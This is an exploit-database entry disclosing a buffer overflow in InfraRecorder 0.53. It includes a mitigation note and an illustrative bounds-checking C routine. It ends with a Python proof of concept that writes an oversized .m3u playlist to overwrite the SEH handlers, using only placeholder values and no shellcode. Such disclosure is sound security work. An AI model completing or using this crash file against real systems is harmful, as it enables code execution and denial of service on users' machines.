Vendor: InfraRecorder
By: Osanda Malith
CVSS: 7,5 (HIGH)
CWE: 120 (Buffer Overflow)
Product Name: InfraRecorder
Affected Version From: 0.53
Affected Version To: 0.53
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP sp2
2013

InfraRecorder Unicode Buffer Overflow

InfraRecorder is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts likely result in denial-of-service conditions.

Mitigation:

Ensure that the application performs adequate boundary checks on user-supplied data.
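A boundary check of the kind this mitigation calls for, as an added example that is not InfraRecorder's code: one playlist line is widened into a fixed wide-character buffer only after its length has been checked against the buffer's capacity. The function names, the 260-element buffer and the one-byte-to-one-wide-char conversion are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <wchar.h>

#define ENTRY_CAP 260 /* assumed size of the fixed entry buffer, in wchar_t */
struct import_result { size_t accepted, rejected; };

/* Widen one playlist line into dst. The length is checked against the
 * destination capacity before any write; an over-long line is rejected
 * (dst untouched) instead of being copied or silently truncated. */
static int widen_entry(const char *line, size_t len, wchar_t *dst, size_t cap)
{
    if (line == NULL || dst == NULL || cap == 0)
        return -1;
    while (len > 0 && (line[len - 1] == '\n' || line[len - 1] == '\r'))
        len--;                        /* strip the line ending */
    if (len >= cap)                   /* no room for text plus terminator */
        return -1;
    for (size_t i = 0; i < len; i++)  /* one byte becomes one wide char */
        dst[i] = (wchar_t)(unsigned char)line[i];
    dst[len] = L'\0';
    return 0;
}

/* Walk an in-memory playlist and count accepted and rejected entries. */
static struct import_result import_playlist(const char *buf, size_t len)
{
    struct import_result r = {0, 0};
    wchar_t entry[ENTRY_CAP];
    for (size_t pos = 0; pos < len; ) {
        const char *line = buf + pos;
        const char *nl = memchr(line, '\n', len - pos);
        size_t n = nl ? (size_t)(nl - line) + 1 : len - pos;
        pos += n;
        if (line[0] == '#' || line[0] == '\r' || line[0] == '\n')
            continue;                 /* directive or blank line */
        if (widen_entry(line, n, entry, ENTRY_CAP) == 0) r.accepted++;
        else r.rejected++;
    }
    return r;
}

int main(void)
{
    char buf[512] = "#EXTM3U\r\nC:\\Music\\track01.mp3\r\n"; /* constructed */
    size_t used = strlen(buf);
    memset(buf + used, 'A', 300);     /* constructed over-long entry */
    struct import_result r = import_playlist(buf, used + 300);
    printf("accepted=%zu rejected=%zu\n", r.accepted, r.rejected);
    return 0;
}
```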

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/67076/info

InfraRecorder is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts likely result in denial-of-service conditions.

InfraRecorder 0.53 is vulnerable; other versions may also be affected. 

#!/usr/bin/python
# Exploit Title: InfraRecorder Unicode Buffer Overflow
# Version: version 0.53
# Download: http://sourceforge.net/projects/infrarecorder/files/InfraRecorder/0.53/ir053.exe/download
# Tested on: Windows XP sp2
# Exploit Author: Osanda Malith
'''
We can overwrite the nseh and seh handlers. If you find a valid unicode ppr address
you can build a successful exploit.
'''
'''
Click Edit -> Import -> import our buffer
'''
junk = "A"*262       # filler before the SEH record
nseh = "BB"          # placeholder for the nseh field
seh = "CC"           # placeholder for the seh field
junk2 = "D"*20000    # trailing filler
# Write every part of the buffer, in order, to the playlist file
with open("Exploit.m3u", "w") as f:
    f.write(junk + nseh + seh + junk2)
#EOF